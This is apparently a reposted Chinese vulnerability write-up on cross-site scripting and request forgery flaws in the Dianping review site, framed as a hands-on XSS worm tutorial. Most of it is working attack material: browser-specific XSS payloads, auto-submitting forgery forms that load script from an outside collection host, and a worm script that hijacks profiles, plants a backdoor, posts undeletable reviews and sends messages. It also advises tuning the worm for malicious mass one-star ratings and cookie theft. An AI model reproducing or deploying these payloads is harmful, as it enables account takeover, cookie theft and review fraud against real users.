好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

点评网主站漏洞打包详解+手把手教你写xss蠕虫

对点评主站的一些 漏洞 加以分析,给出各种漏洞的利用场景,最后再教大家如何写简单xss蠕虫

 点评网站主要还是存在跨站问题,包括:存储,反射型xss,httponly没有设置,csrf无防御

 

1 首先先来几个反射型xss,相对于一般的网站此类危害较小

但由于点评对于跨站基本无防护,加上私信可以批量发送,反射型xss用谷歌短链转换下,危害还是很大的,包括盗取cookies,修改用户信息留后门,任意发表点评等,具体用法可参考之后的蠕虫脚本

 

反射型,火狐直接使用

"/><script>alert(/1/)</script>就可以了

ie8需要使用二哥的0day

 

"id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>

chrome则使用

"><svg><script xlink:href=//********></script>

反射型还是很多的,工具都能扫到一堆,更不用说dom的了,随便举几个例子

 

 

 

 

2 至于怎么批量发送私信可以查看post接口

 

 

这里只要使用burp或自己写个脚本将targetName参数化,该值为用户名,可以批量获取后永久使用,然后通过该接口可以批量发送小广告,恶意链接等,比如[该美食店不错哦,请看连接]。

 

3 说到私信了就不说说私信存在的一个csrf获取cookies的用法,表面上私信内容都是过滤的,但是对于输入的名字未过滤,但无法形成存储性xss,不过可以通过csrf构造post的反射型,弹框如图

 

具体csrf的脚本如下,自己放自己的shell网站上是不错的选择,比如美食的网站

firefox和chrome的

 

<html>

<body>

<form id="wrhoooo" name="wrhoooo" action="http://HdhCmsTestdianping测试数据/msg/send/6671203" method="post">

<input type="test" name="postBack" value="true" />

<input type="test" name="targetName" value='"><svg><script xlink:href=http://xss.tw/989></script>' />

<input type="test" name="content" value='123' />

</form>

<script>

document.wrhoooo.submit();

</script>

</body>

</html>

ie8的

 

<html>

<body>

<form id="wrhoooo" name="wrhoooo" action="http://HdhCmsTestdianping测试数据/msg/send/6671203" method="post">

<input type="test" name="postBack" value="true" />

<input type="test" name="targetName" value='"id=><div/id=x>x</div><xml:namespace  prefix=t><import namespace=t  implementation=#default#time2><t:set/attributename=innerHTML targetElement=x  to=&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror=&amp;#x0022;with&amp;#x0028;document&amp;#x0029;body.appendChild&amp;#x0028;createElement&amp;#x0028;&amp;#x0027;script&amp;#x0027;&amp;#x0029;&amp;#x0029;.src=&amp;#x0027;http://xss.tw/989&#x0027;&amp;#x0022;&amp;gt;>' />

<input type="test" name="content" value='1' />

</form>

<script>

document.wrhoooo.submit();

</script>

</body>

</html>

 

4 既然说到了私信那么更要说说本身存在的csrf问题,包括私信,关注,鲜花,好评,更改用户资料等,url长度各 浏览器 有点区别,ie的最短为2000字节

由于程序员在解析请求时没有区分post和get,导致所有请求包括发表点评都可以通过引用站外图片的方式来执行请求,或者直接一个连接,连接为

 

由于社区编辑器控件的关系对于站内地址是无过滤的,可以用来给商家刷点评,危害也不小啊,特别提一下还有办法让用户删不掉点评,待会蠕虫再说

 

 

再看下有没有自动发点评

 

 

相对于这个功能对于以点评为中心的应该算比较高危的了,刷其他的都是小事

 

5 说好了反射的那就说说一些自己x自己的存储型的,举个例子,蠕虫也会提到

这个地方过滤了<script>,但没有过滤<frame>,不知道开发是不是js比较差,应该和其他地方一样对于' " <>进行过滤

 

 

6 最后再说说盲打这个问题,直接看图吧

 

 

 

下面就要讲重点了蠕虫,蠕虫点为点评时的停车信息。首先大家要知道,就算防止了csrf,包括referer,token,由于是调用到站内的js,referer无效了,token一般都是可以通过js读取的,具体可参考新浪蠕虫的例子,由于点评没有token我也就没写这段代码了。

 

先看看效果吧,由于不敢测试我把xss蠕虫先写成了csrf,代码如下,调用了sogili写的那个xss.js

 

< html >

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<body>

<script src="http://mmme.me/xss.js" >

</script>

<script>

xss.najax('http://HdhCmsTestdianping测试数据/msg/send/1472480?postBack=true&targetName=%E5%AE%A2%E6%9C%8D%E7%B2%BE%E7%81%B5&content=%E5%AE%A2%E6%9C%8D%E7%B2%BE%E7%81%B5%E6%88%91%E7%9A%84%E5%8F%B7%E8%A2%AB%E7%9B%97%E4%BA%86%E6%80%8E%E4%B9%88%E5%8A%

 

9E')

</script>

<script>

xss.najax('http://HdhCmsTestdianping测试数据/member/myinfo/setup/basic',{userNickName:'tes'+xss.rdm(),userSex:'1',userCityName:'1',userSign:'"><script src=//xss.tw/989><script>',operation:'update',currentUserSign:''})

userNickName=xss.rdm();

</script>

<script>

xss.najax('http://HdhCmsTestdianping测试数据/ajax/json/shop/review',{run:'a',s:'60'+xss.rdm(),category:'10',cityid:'1',s1:'4',s2:'4',s3:'4',ap:'-1',body:'This is just a test, just for fun, worm tester.This is just a test, just for fun, worm tester.This is just a test, just for fun, worm tester.This is just a test, just for fun, worm tester.This is just a 

 

test, just for fun, worm tester.This is just a test, just for fun, worm tester',park:'"><script src=//xss.tw/989><script>',setag:'false',tap:'true',s4:'1',cat:'false',tuangou:'false',star:'30',m101:'0',keylist:'m101'})

s=xss.rdm();

</script>

<script>

alert(/你点评的名字被改了,账号被盗了,你信么,看看是不是还给别人发了私信,是不是还随机商家发了点评,还有自带蠕虫地址哦,是不是还能做其他的事情呢/)

</script>

</body>

</html>

1 看看效果先,之后讲讲怎么更好利用

 

随机一个商户发表点评,可以从图中看到没有删除按钮,

"><script src=//xss.tw/989><script>的关系,里面的地址就是蠕虫的js,那么随机评价好不好呢,当然不是最佳的,最好的其实是写个100个最火商家的集合再加几组数字来进行随机,那么效果肯定非常好。

那么点评内容呢,当然也要多些几组来随机,如果恶意的话评分都是1好了,还有那个蠕虫点停车信息,可以弄个一次为空,一次不为空随机,不要蠕的太厉害了。

 

2 第二个请求是什么呢,看图吧

 

 

原来我的名字被改了,规则为'tes'+xss.rdm(),唉果然被盗号了啊,看看在自我介绍还留了后门,编辑资料就触发,其实常居地也是。可以看看被改的一个账号的

 

 

我登上去的时候名字已经改回来了

 

3 最后看看是不是给某某发了私信

 

 

既然效果都达到了

 

现在知道蠕虫点位停车信息,这个蠕虫点很好,发表点评即可显示在每个商户的点评页,高分的人还能直接显示在默认点评

那么首先蠕虫是怎么写的呢,首先我们要知道请求一般都是通过form表单或者ajax格式发送的,我们写js的时候只要模拟用户提交就可以了。

因为xss可以调用站外脚本,我们只要把请求写在我们自己的js里,如果有token,只要想办法调用下token就可以了。

 

1 那么我们可以先打开http://xsser.me,创建一个项目,勾选默认和xss.js,默认因为我们要获取cookies。

 

2 在自定义代码中加入刚才的三个请求,直接复制粘贴就可以了,如图

 

 

由于我刚才使用csrf测试的,所以用了x.najax这个伪ajax方法,csrf直接用ajax试过不行,估计限制了跨域请求,这个每个网站设置不同。x.najax的好处是站内站外都能用,可以好好看看http://mmme.me/xss.js就明白了

 

3 之后点击下一步可以看到详细代码,我就不贴了,调用js地址就是http://xsser.me/zJ5sSA?1358******,由于上面我没有直接使用蠕虫地址在脚本的那个停车信息,我们也可以测试下,是否成功写好蠕虫代码了。

 

4 js调用成功

 

 

5 看看是否执行请求

 

可以看到效果多点了几下,发现可以蠕虫了,个人信息页被改了,蠕虫的用法就介绍到这里吧,例子很简单。对于厂商有个自动屏蔽点评功能不错,但如果一些点评没有带蠕虫的恶意点评不会自动屏蔽,有时候也不是所有带恶意点评的蠕虫都会屏蔽。

 

 

修复方案: 觉得严重的一一修复吧 

 

查看更多关于点评网主站漏洞打包详解+手把手教你写xss蠕虫的详细内容...

  阅读:50次